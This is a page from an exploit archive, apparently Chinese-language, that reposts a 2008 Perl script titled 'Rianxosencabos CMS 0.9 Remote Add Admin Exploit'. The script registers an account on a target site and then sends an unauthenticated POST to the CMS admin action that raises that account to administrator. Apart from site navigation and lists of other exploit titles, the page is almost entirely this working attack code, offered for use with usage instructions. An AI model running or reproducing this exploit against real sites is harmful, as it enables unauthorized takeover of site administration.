首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Rianxosencabos CMS 0.9 Remote Add Admin Exploit 来源：www.domlabs.org 作者：ka0x 发布时间：2008-09-24   #!/usr/bin/perl -w # Rianxosencabos CMS 0.9 Remote Add Admin Exploit # Download: http://downloads.sourceforge.net/rsccms/rsccms.tar.gz # written by ka0x <ka0x01 [at] gmail [dot] com> # D.O.M Labs - Security Researchers # - www.domlabs.org - use LWP::UserAgent; my ($host, $login, $pass, $mail, $user_id) = @ARGV ; unless($ARGV[4]){ print "[*] usage: perl $0 <host> <login> <pass> <mail> <user_id>\n"; print "[*] ex: perl $0 http://localhost/ ka0x 12345 ka0x01[at]gmail.com 2\n"; exit 1; } if ($host !~ /^http:/){ $host = 'http://'.$host; } my $ua = LWP::UserAgent->new() or die ; $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1") ; $ua->timeout(10) ; sub __CREATE { my $req = HTTP::Request->new(POST => $host."index.php?s=usuarios&accion=registrar") ; $req->content_type('application/x-www-form-urlencoded') ; $req->content("reg_login=".$login."&reg_pass=".$pass."&reg_repass=".$pass."&reg_nombre=".$login."&reg_mail=".$mail."&submit_register=Rexistrar") ; my $res = $ua->request($req) ; my $location = $res->header('Location') ; if ($location =~ /Usuario creado/i) { print "[+] user added: ".$login ; print "\n[+] password: ".$pass, "\n" ; } else{ print "[-] Exploit Failed!\n" ; } } &__CREATE ; sub __ADMIN { my $req = HTTP::Request->new(POST => $host."?s=admin&accion=lista") ; $req->content_type('application/x-www-form-urlencoded') ; $req->content($user_id."=0&inputOculto=".$user_id) ; $ua->request($req) ; } &__ADMIN ; __END__   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·iGaming CMS <= 1.5 Multiple Re ·BurnAware NMSDVDXU ActiveX Rem ·CJ Ultra Plus <= 1.0.4 Cookie ·Google Chrome Browser Carriage ·Debian Sarge Multiple IMAP Ser ·Sagem Routers F@ST Remote CSRF ·Libra PHP File Manager <= 1.18 ·WSN Links Free 4.0.34P (commen ·ICONICS Vessel / Gauge / Switc ·WCMS v.1.0b Arbitrary Add Admi ·LanSuite 3.3.2 (fckeditor) Arb ·PHP iCalendar <= 2.24 (cookie_   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved